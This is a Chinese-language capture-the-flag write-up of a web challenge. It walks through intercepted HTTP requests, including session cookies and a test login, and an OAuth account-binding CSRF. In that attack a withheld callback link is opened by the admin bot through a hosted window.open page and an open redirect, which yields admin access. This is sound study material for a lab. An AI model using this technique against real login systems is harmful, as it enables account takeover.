http://106.75.66.211:8000/main/login?next=/main/post
今天晚上才知道有nuca的比赛,找到一个账号随便看了几眼,看了一个blog题目,在此记录一下。最后思路清晰了,可是结束之前没有做出来,感觉自己真的是老了,打不动CTF了,想想去年nuca的决赛精心动魄的场景。。。。现在都第三届CTF了,自己花的时间也因为这样那样的原因在逐渐变少,不适合打CTF了。。。。
记录一下吧:
有个注册页面:
http://106.75.66.211:8000/main/register
有个登陆页面
http://106.75.66.211:8000/main/login
有csrf的页面
http://106.75.66.211:8000/main/login?next=/main/index
有个第三方授权登陆
http://106.75.66.211:8888/oauth?client_id=3f66bf84f42fec8fd6348593ab74db04&redirect_uri=http%3A%2f%2f106.75.66.211:8000%2fmain%2foauth%2f&scope=user&response_type=code
先在http://106.75.66.211:8888/
上面注册了一个用户
然后登陆抓包,得到
GET /oauth?client_id=3f66bf84f42fec8fd6348593ab74db04&redirect_uri=http%3A%2f%2f106.75.66.211:8000%2fmain%2foauth%2f&scope=user&response_type=code HTTP/1.1
Host: 106.75.66.211:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://106.75.66.211:8000/main/login?next=/main/index
Connection: close
Cookie: PHPSESSID=9g0mcsl3vrkdoikcscds18su10; session=.eJw9kMGKwkAQRH9lmbMHnSR7CHhQskqE7qD0GHoughode5xdSJQ1I_77Bg97qsurB1VPtTu1TedUfmvvzUjtLkeVP9XHXuWKyWRYrwJr6JHWKVPZszYpCycYSs3RZLaGHuLcVbX1WNsrysaxQGJllgANPfnKbNgGO_CDIwE5J7Y2D6RrQIJJVVjPYSsYrUBheqZ5gLAeg15cLK0EllvP2rpqSKDywXSIgycOvOfaaIyQYTGbqtdIHbr2tLv9-Ob7fwKSE6TDBJYbbwsnrMusKhaeZROAzC_L0YEGjeJ7oHOGkVNYT9-6e9e07zvUZPyZqtcfcARhYg.W_l1hA.ZaBskzR4gtxIw-MZ9Nbx-fyEKiY
Upgrade-Insecure-Requests: 1
需要输入第三方的邮箱和密码,点击授权,抓包如下:
POST /oauth?client_id=3f66bf84f42fec8fd6348593ab74db04&redirect_uri=http%3A%2f%2f106.75.66.211:8000%2fmain%2foauth%2f&scope=user&response_type=code HTTP/1.1
Host: 106.75.66.211:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://106.75.66.211:8888/oauth?client_id=3f66bf84f42fec8fd6348593ab74db04&redirect_uri=http%3A%2f%2f106.75.66.211:8000%2fmain%2foauth%2f&scope=user&response_type=code
Content-Type: application/x-www-form-urlencoded
Content-Length: 138
Connection: close
Cookie: PHPSESSID=9g0mcsl3vrkdoikcscds18su10; session=.eJw9kMGKwkAQRH9lmbMHnSR7CHhQskqE7qD0GHoughode5xdSJQ1I_77Bg97qsurB1VPtTu1TedUfmvvzUjtLkeVP9XHXuWKyWRYrwJr6JHWKVPZszYpCycYSs3RZLaGHuLcVbX1WNsrysaxQGJllgANPfnKbNgGO_CDIwE5J7Y2D6RrQIJJVVjPYSsYrUBheqZ5gLAeg15cLK0EllvP2rpqSKDywXSIgycOvOfaaIyQYTGbqtdIHbr2tLv9-Ob7fwKSE6TDBJYbbwsnrMusKhaeZROAzC_L0YEGjeJ7oHOGkVNYT9-6e9e07zvUZPyZqtcfcARhYg.W_l2Hg.ZdJGqOlbJKvakfGINDRuQIgcClk
Upgrade-Insecure-Requests: 1
csrf_token=1543078958%23%23a94277a01963de74cbcd5118092d0ba474c14bf0&email=1146607%40qq.com&password=fangzhang&submit=%E6%8E%88+++%E6%9D%83
接下来重点来了:
GET /main/oauth/?state=eSIoXSEPz4&code=ONX9fmIHuiG7nXe2yINCgTmjXV2QwYIrU3gSFx7q HTTP/1.1
Host: 106.75.66.211:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://106.75.66.211:8888/oauth?client_id=3f66bf84f42fec8fd6348593ab74db04&redirect_uri=http%3A%2f%2f106.75.66.211:8000%2fmain%2foauth%2f&scope=user&response_type=code
Connection: close
Cookie: PHPSESSID=9g0mcsl3vrkdoikcscds18su10; session=.eJw9kMGKwkAQRH9lmbMHnSR7CHhQskqE7qD0GHoughode5xdSJQ1I_77Bg97qsurB1VPtTu1TedUfmvvzUjtLkeVP9XHXuWKyWRYrwJr6JHWKVPZszYpCycYSs3RZLaGHuLcVbX1WNsrysaxQGJllgANPfnKbNgGO_CDIwE5J7Y2D6RrQIJJVVjPYSsYrUBheqZ5gLAeg15cLK0EllvP2rpqSKDywXSIgycOvOfaaIyQYTGbqtdIHbr2tLv9-Ob7fwKSE6TDBJYbbwsnrMusKhaeZROAzC_L0YEGjeJ7oHOGkVNYT9-6e9e07zvUZPyZqtcfcARhYg.W_l2gw.fKu_sSqB7zDWUPCUUnmST4MSz3A
Upgrade-Insecure-Requests: 1
得到一个state 和一个code貌似这个访问之后就会授权成功,成功之后,意味着用户名和邮箱发生了绑定,这也是漏洞存在的地方:
一个账号可以绑定多个第三方邮箱
登陆成功之后
有一个提交漏洞的地方,说是管理员会访问
让自己注册的第三方绑定管理员的账号,让管理员去访问刚才生成的那个有state和code的链接,然后再用自己的第三方用户名和密码去访问,自己的邮箱和管理员的账号就绑定起来了,就获得admin的权限了,
注册第三方账号
注册该网站账号
绑定第三方账号
输入自己的第三方邮箱和密码
生成验证链接
将和获取的location保存:(注意这里不要访问,在burp的porxy里drop掉)
http://106.75.66.211:8000/main/oauth/?state=L3TY0uHc3B&code=nICeZTIif50fgliGcPV3bG64PqpUPNqD3oOyIXgu
在远程主机上构造如下页面:
<html>
<script>window.open('http://106.75.66.211:8000/main/oauth/?state=L3TY0uHc3B&code=nICeZTIif50fgliGcPV3bG64PqpUPNqD3oOyIXgu')</script>
</html>
将远程主机上的域名+路径 转化问短链接 提交到页面上去
http://106.75.66.211:8000/main/login?next=http://0x9.me/u3VXM
机器人访问之后用第三方邮箱登陆得到flag